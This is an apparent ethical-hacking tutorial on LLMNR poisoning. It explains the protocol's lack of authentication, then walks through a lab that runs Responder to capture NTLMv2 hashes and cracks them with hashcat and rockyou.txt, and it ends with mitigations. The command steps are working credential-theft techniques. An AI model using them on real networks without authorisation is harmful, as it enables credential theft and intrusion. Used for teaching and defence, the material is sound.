LLMNR Poisoning

Last Updated : 4 May, 2026

LLMNR (Link-Local Multicast Name Resolution) is a Windows protocol used to resolve hostnames on a local network when DNS fails. It sends multicast queries to all devices in the subnet, allowing any system to respond. Because it lacks strong authentication, it can be abused to intercept authentication attempts. This makes it a frequent target in internal network attacks.

  • Uses UDP port 5355 for multicast name queries
  • Can be exploited via spoofed responses to capture credentials
  • Often works alongside NetBIOS Name Service fallback behavior
  • Commonly used in internal penetration testing scenarios
  • Recommended mitigation is disabling LLMNR on enterprise networks

Example: If a client cannot resolve fileserver01 via DNS, it broadcasts an LLMNR query asking “Who is fileserver01?”. A malicious host can respond and impersonate that name to capture authentication attempts.

Security Flaw in LLMNR

The major weakness of LLMNR is lack of authentication:

  • No Authentication Mechanism: LLMNR does not verify whether the responding system is legitimate. Any machine on the local network can reply to a name resolution request.
  • Blind Trust on Responses: When a client broadcasts a query (e.g., “Who is FILESERVER?”), it accepts the first response received, without validating the identity of the responder.
  • No Integrity or Source Verification: There is no built-in method to confirm that the response actually came from the intended host, making spoofing trivial.
  • Easy Impersonation by Attackers: Attackers on the same network can pretend to be legitimate services (e.g., file servers, printers, domain controllers).
  • Credential Exposure Risk: Once a victim connects to the attacker’s machine, the system may automatically attempt authentication using NTLM hashes, which can be intercepted.

Tools Used in LLMNR Poisoning

1. Responder

  • A widely used tool for performing LLMNR/NBT-NS poisoning attacks.
  • Listens for broadcast name resolution requests and sends spoofed responses.
  • Tricks victims into connecting to the attacker’s machine.
  • Captures NTLMv1/v2 hashes during authentication attempts.
  • Can also act as fake services (SMB, HTTP, FTP, etc.) to maximize credential capture.

2. Impacket

  • A collection of Python tools designed for network protocol manipulation and exploitation environments.
  • Perform advanced attacks such as: SMB Relay Attacks , Pass-the-Hash (PtH) attacks, Remote command execution.
  • Helps attackers move from initial access to privilege escalation.

3. Hashcat

  • A powerful password cracking tool used to recover plaintext passwords from captured hashes.
  • Supports GPU acceleration for high-speed cracking.
  • Uses techniques such as dictionary attack, password attack, brute force attack.

Hands-On Lab: LLMNR Poisoning in Active Directory

This will start the cracking process and, if the password is weak or present in the wordlist, hashcat will successfully recover it.

Step 1: Install Required Tools (Kali Linux)

You need to install impackets tool-kit in your Kali machine for this Lab.

Command:

sudo apt update
sudo apt install impacket-scripts -y

Step 2: Start Responder

Listens for LLMNR/NBT-NS requests, Spoofs responses, Captures NTLM hashes.

Command:

sudo responder -I eth0 -wdv

Output:

responder1
Start Responder

Step 3: Trigger the Attack (Victim Machine)

This forces a name resolution attempt and triggers LLMNR. On PC1, open File Explorer and enter:

\\10.0.2.7

Output:

responder2
Attack Trigered
  • After this you will notice hashdump in the responder's listener in you Kali Machine.

Output:

responder4
HashDump
  • Let’s try to crack the hash using hashcat. Cracking a hash is generally impossible unless you have a list of cracked or common passwords. In this scenario, we are using a weak password, which makes it much easier to crack with the hashcat tool.

Step 4: Capture the Hash

On Kali Linux, Responder will log Username, NTLMv2 hash. Save the hash into a file:

ntlmhash.txt

Output:

responder5
Capture The Hash

Step 5: Crack the NTLMv2 Hash

To crack the NTLV2Hash run the below command.

hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt -O
  • -m 5600: NTLMv2 hash mode
  • rockyou.txt: Common password wordlist
  • -O: Optimized kernel

Extracting and Using the Wordlist (rockyou.txt)

In many penetration testing environments, the rockyou.txt wordlist is compressed by default. Before using it for password cracking, it must be extracted.

Step 1: Extract rockyou.txt (if required)

If the wordlist is compressed, navigate to the wordlists directory and decompress it:

cd /usr/share/wordlists
sudo gzip -d rockyou.txt.gz
  • This will extract the rockyou.txt file, making it available for use in password cracking tools like Hashcat.

Note: If using Windows Terminal, download Hashcat from the official site. In this example, Ubuntu is used, so installation steps may differ, but the commands are the same. Save the hash file on your host OS and install Hashcat.

Step 2: Running Hashcat in Resource-Constrained Environments

  • In some virtual machines with low RAM/CPU may cause Hashcat to run slowly, crash or fail to initialize
  • In such cases, it is better to use a host machine instead of the VM for cracking tasks
  • Ensure the hash file is transferred from VM to host system securely

Step 3: Using Hashcat on a Host Machine

If you are using a Windows system, download Hashcat from its official source and extract it. Ensure the NTLM hash file is also available on your system before running the tool.

Windows Environment:

  • Download Hashcat from the official website
  • Extract the tool to a folder

Ensure the following files are available:

  • hashcat64.exe
  • ntlmhash.txt
  • rockyou.txt wordlist

Command:

hashcat64.exe -m 5600 ntlmhash.txt C:\path\to\rockyou.txt --force

Linux (Ubuntu or Similar Distributions):

  • Install or download Hashcat on the host system
  • Ensure both hash file and wordlist are accessible

Command:

hashcat -m 5600 ntlmhash.txt /path/to/rockyou.txt --force

Output:

responder6
Hashcat(Linux)

LLMNR Mitigations

Link-Local Multicast Name Resolution (LLMNR) can be exploited by attackers to intercept credentials through spoofed responses. To mitigate this risk, organizations should implement the following controls:

  • Disable LLMNR and NBT-NS: Turn off these protocols at the system or group policy level to eliminate the attack surface.
  • Enforce strong authentication: Use long, complex passwords and avoid common terms to make captured hashes harder to crack.
  • Apply network access controls: Limit who and what can connect to the internal network, reducing exposure to rogue devices.
  • Disabling unnecessary name resolution protocols, combined with strong password policies and strict network access controls, significantly reduces the effectiveness of LLMNR poisoning attacks.
Comment
Article Tags:
Ethical Hacking
Cyber Security

Explore